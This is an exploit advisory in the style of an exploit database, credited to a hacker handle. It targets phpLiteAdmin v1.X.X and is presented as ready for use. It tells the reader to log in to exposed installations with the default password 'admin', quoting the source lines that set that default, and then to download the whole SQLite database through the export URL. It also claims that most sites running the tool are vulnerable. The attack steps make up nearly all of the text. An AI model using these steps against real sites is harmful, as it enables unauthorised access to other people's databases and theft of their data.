phpLiteAdmin v1.X.X Auth Bypass/Download DB vulnerabilities‏

X-------------------------------------------------------------X
 _____ _   _ _   _ _____ _____ _____  ___   _   _   _______   _______ ___________ 
|_   _| | | | \ | |_   _/  ___|_   _|/ _ \ | \ | | /  __ \ \ / / ___ \  ___| ___ \
  | | | | | |  \| | | | \ `--.  | | / /_\ \|  \| | | /  \/\ V /| |_/ / |__ | |_/ /
  | | | | | | . ` | | |  `--. \ | | |  _  || . ` | | |     \ / | ___ \  __||    / 
  | | | |_| | |\  |_| |_/\__/ /_| |_| | | || |\  | | \__/\ | | | |_/ / |___| |\ \ 
  \_/  \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/  \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X                                                                                  
 
 
[+] Author: TUNISIAN CYBER
[+] Exploit Title:  phpLiteAdmin v1.X.X Auth Bypass/Download DB vulnerabilities
[+] Date: 8-12-2013
[+] Category: WebApp
[+] Google Dork: n/a
[+] Tested on: Win7 , ubuntu 13.04
 
 
########################################################################################

1/ Auth Bypass:
127.0.0.1/phpliteadmin.php

username: admin

Source Code (lines 35--->36) (v1.6)

//password to gain access (change this to something more secure than 'admin')
$password = "admin";

Source Code (lines 47--->48) (1.9.4.1)
//password to gain access
$password = 'admin';

2/Download DB:
127.0.0.1/phpliteadmin.php?view=export
Go To "Save As" then click "Export"

Sites that could be infected: 85/100



./3nD
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt

#  0day.today [2018-01-05]  #